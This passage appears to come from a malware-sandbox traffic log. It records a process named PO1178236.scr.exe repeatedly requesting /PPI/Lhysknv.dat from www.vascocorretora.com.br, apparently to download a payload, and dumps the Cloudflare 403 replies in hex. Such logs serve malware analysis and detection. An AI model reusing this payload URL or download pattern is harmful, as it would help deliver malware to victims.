        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:41 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QI4wmCIm13qp8ptebjlJkB6jogJKQpbXwFq7ggu7GDMSPoaz0diyc7KMBJd3eMluLus3ZzYEwkJIsV%2FApUxyWy80YFkaMd2mwrvuM9Mng5HWrIe%2BpuO%2FbsEqySx5cGrpu%2FnVIEVudsrgAnRS"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c313e90c0f6b-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1629&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1751649&cwnd=210&unsent_bytes=0&cid=53114d47ddc7a59e&ts=155&x=0"
        2025-01-09 07:37:26 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:26 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:37:26 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:26 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 33 31 33 65 39 30 63 30 66 36 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c313e90c0f6b</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:26 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 33 31 33 65 39 30 63 30 66 36 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c313e90c0f6b',t:'MTczNjQwODI0Ni4wMDAwMDA='};var
        2025-01-09 07:37:26 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        146192.168.2.949855188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:26 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:27 UTC1015INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:27 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:42 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J6uxKQUnvCFqtOTKgvn9FnhB0fxJsrE%2FUsefBT5w4iFA7AF5T%2FCtZYHq79TRCpkugEJrugllEosk%2Fwk%2B0p8iqX%2BMYtooQWmZBXxbY4Ak%2B621tpwEDlHjqYwSGvBOfJnDx5H%2FFp6d%2BMkI7G1f"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c317ebb40ca0-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1481&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1931216&cwnd=239&unsent_bytes=0&cid=a0de1b244e64acff&ts=153&x=0"
        2025-01-09 07:37:27 UTC354INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:27 UTC1369INData Raw: 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22
        Data Ascii: | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="
        2025-01-09 07:37:27 UTC1369INData Raw: 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21
        Data Ascii: -section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div><!
        2025-01-09 07:37:27 UTC1369INData Raw: 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 33 31 37 65 62 62 34 30 63 61 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73
        Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c317ebb40ca0</strong></span> <span class="cf-footer-separator s
        2025-01-09 07:37:27 UTC1008INData Raw: 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 33 31 37 65 62 62 34 30 63 61 30 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4e 79 34 77 4d 44 41 77 4d 44
        Data Ascii: pt> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c317ebb40ca0',t:'MTczNjQwODI0Ny4wMDAwMD
        2025-01-09 07:37:27 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        147192.168.2.949856188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:27 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:27 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:27 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:42 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iT6nG6aTxCqWoi2gVGA9kOL9ZuJyqPj7gXbSn3CeDFxnNl51XmOaRhh9NPFCisJL%2FLog6YGynY90OK8yAWSDYabkQ0QVJr7rrWnZJLD%2B%2BRsYfgHss0J923KhIrWAUk3dj04uOHR%2BoYtXauP%2F"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c31bbec0431b-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2089&rtt_var=790&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1397797&cwnd=178&unsent_bytes=0&cid=b95d1dfa5cbe1433&ts=147&x=0"
        2025-01-09 07:37:27 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:27 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:37:27 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:37:27 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 33 31 62 62 65 63 30 34 33 31 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c31bbec0431b</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:37:27 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 33 31 62 62 65 63 30 34 33 31 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c31bbec0431b',t:'MTczNjQwODI0Ny4wMDAwMDA='};v
        2025-01-09 07:37:27 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        148192.168.2.949857188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:28 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:28 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:28 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:43 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj5odEXtXXUu2tJOAG%2B7axE8zvFuQlijbKmHfC2jcf%2BO9hcTSB%2FGNxGkaNGcVyVK%2Fx4LI1QkKbEHuuZPNX%2B09Uzsq%2BXbAce8kMi6rg8ShVvoV2VHMTQsehZFqZOWLodlTPYhDKcZT3y%2Bsxpo"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c31f7a7a72ab-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1993&rtt_var=760&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1427872&cwnd=208&unsent_bytes=0&cid=12d2a2bff07826bd&ts=139&x=0"
        2025-01-09 07:37:28 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
